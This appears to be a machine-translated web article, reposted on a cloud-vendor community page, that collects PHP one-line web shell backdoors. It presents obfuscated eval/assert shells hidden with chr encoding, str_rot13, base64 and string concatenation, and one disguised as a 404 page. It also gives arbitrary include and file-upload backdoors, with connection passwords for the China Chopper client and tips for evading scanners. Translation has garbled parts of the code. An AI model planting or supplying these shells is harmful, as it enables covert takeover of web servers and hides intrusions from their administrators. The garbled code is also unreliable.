Those powerful PHP a word back door

Source: Internet
Author: User

Tough PHP a word back door


Common one:

<?php $a =range (1,200), $b =chr ($a [96-1+1]). chr ($a [114-1+1]). chr ($a [114-1+1]). chr ($a [100-1+1]) . chr ($a [115-1+1]);


$b (${CHR ($a [94]). CHR ($a [+]). chr ($a [+]). chr ($a [[]])}[CHR ($a [51])]);

?>

That's why I'm connected.

ASSERT (${_post}[4]);

The password is 4.




Common two:

<?php

($b 4dboy = $_post[' B4dboy ') && @preg_replace ('/ad/e ', ' @ '. str_rot13 (' Riny '). ' ($b 4dboy) ', ' Add ');

?>


Using the same as the original sentence no difference, the use of common client connection password B4dboy.


str_rot13 (' Riny ') is the encoded eval that completely avoids the keyword without losing its effect.




This kind of backdoor lets the website, the server administrator is the headache frequently has to change the method carries on the various detection and many new writing technology uses the common detection method to be unable to discover and the processing. Today we count some interesting php a word trojan.


Hide php pony with 404 pages

<! DOCTYPE HTML PUBLIC "-//ietf//dtd HTML 2.0//en" >

<title>404 not found</title>

<p>the requested URL is not found on this server.</p>

</body>

<?php

@preg_replace ("/[pageerror]/e", $_post[' error '], "Saft");

Header (' http/1.1 404 Not Found ');

?>

404 pages are commonly used in Web site generally recommended after a few people will go to it to check the changes at this point we can use this to hide the backdoor.


No feature hide PHP sentence


<?php

Session_Start ();

$_post[' code ' && $_session[' thecode '] = Trim ($_post[' code ');

$_session[' Thecode ']&&preg_replace (' ' a\ ' eis ', ' e '. ') V '. ' A '. ' L '. ' (Base64_decode ($_session[\ ' thecode\ ')) ', ' a ');


Assign the contents of $_post[' code '] to $_session[' Thecode '] and then execute $_session[' Thecode ' The highlight is no signature. Using the scanning tool to check the code is not to call the police to achieve the purpose.




Three variants of a sentence PHP Trojan


First one

<?php ([email protected]$_get[2]) [email protected]$_ ($_post[1])?>

Write the Http://site/1.php?2=assert code in the chopper is 1.


A second

<?php

$_="";

$_[+ "]=";

$_="$_"."";

$_=($_[+""]|""). ($_[+""]|""). ($_[+""]^"");

?>

<?php ${' _ '. $_}[' _ '] (${' _ '. $_}[' __ ']);? >

Write Http://site/2.php?_=assert&__=eval ($_post[' Pass ') in the kitchen knife password is pass. If you use the additional data of the kitchen knife more covert or with other injection tools can also be submitted because it is post.


A third

($b 4dboy = $_post[' B4dboy ') && @preg_replace ('/ad/e ', ' @ '. str_rot13 (' Riny '). ' ($b 4dboy) ', ' Add ');

str_rot13 (' Riny ') is the encoded eval that completely avoids the keyword without losing its effect and makes people vomit blood.


Last column A few advanced PHP a word trojan backdoor


1.

$hh = "P". " R "." E "." G "." _"." R "." E "." P "." L "." A "." C "." E ";

$HH ("/[discuz]/e", $_post[' h '], "Access");

Kitchen knife A word

2.

$filename =$_get[' xbid '];

Include ($filename);

Dangerous include function directly compiles any file to run in PHP format

3.

$reg = "C". " O "." P "." Y ";

$reg ($_files[myfile][tmp_name],$_files[myfile][name]);

Rename any File

4.

$gzid = "P". " R "." E "." G "." _"." R "." E "." P "." L "." A "." C "." E ";

$gzid ("/[discuz]/e", $_post[' h '], "Access");

Kitchen knife A word

5.

Include ($UID);

Dangerous include function directly compiles any file to run post www.xxx.com/index.php?uid=/home/www/bbs/image.gif in PHP format

GIF insert a sentence

6.

Typical sentence

Program Backdoor Code

<?php Eval_r ($_POST[SB])?>

Program code

<?php @eval_r ($_POST[SB])?>

Fault Tolerant Code

Program code

<?php assert ($_POST[SB]);? >

Use Lanker to execute related PHP statements in the client's expert mode

Program code

<?$_post[' sa '] ($_post[' SB ');? >

Program code

<?$_post[' sa '] ($_post[' SB '],$_post[' SC ')?>

Program code

<?php

@preg_replace ("/[email]/e", $_post[' h '], "error");

?>

After using this, use the chopper a word when the client configures the connection in the "Config" field, enter

Program code

<o>[email Protected]_r ($_post1);</o>

Program code

<script language= "PHP" > @eval_r ($_POST[SB]) </script>

to bypass the <


All these PHP a word back door is perfectly formed carelessly you certainly in the recruit.

Those powerful PHP a word back door

Contact Us

The content source of this page is from Internet, which doesn't represent Alibaba Cloud's opinion; products and services mentioned on that page don't have any relationship with Alibaba Cloud. If the content of the page makes you feel confusing, please write us an email, we will handle the problem within 5 days after receiving your email.

If you find any instances of plagiarism from the community, please send an email to: info-contact@alibabacloud.com and provide relevant evidence. A staff member will contact you within 5 working days.

A Free Trial That Lets You Build Big!

Start building with 50+ products and up to 12 months usage for Elastic Compute Service

  • Sales Support

    1 on 1 presale consultation

  • After-Sales Support

    24/7 Technical Support 6 Free Tickets per Quarter Faster Response

  • Alibaba Cloud offers highly flexible support services tailored to meet your exact needs.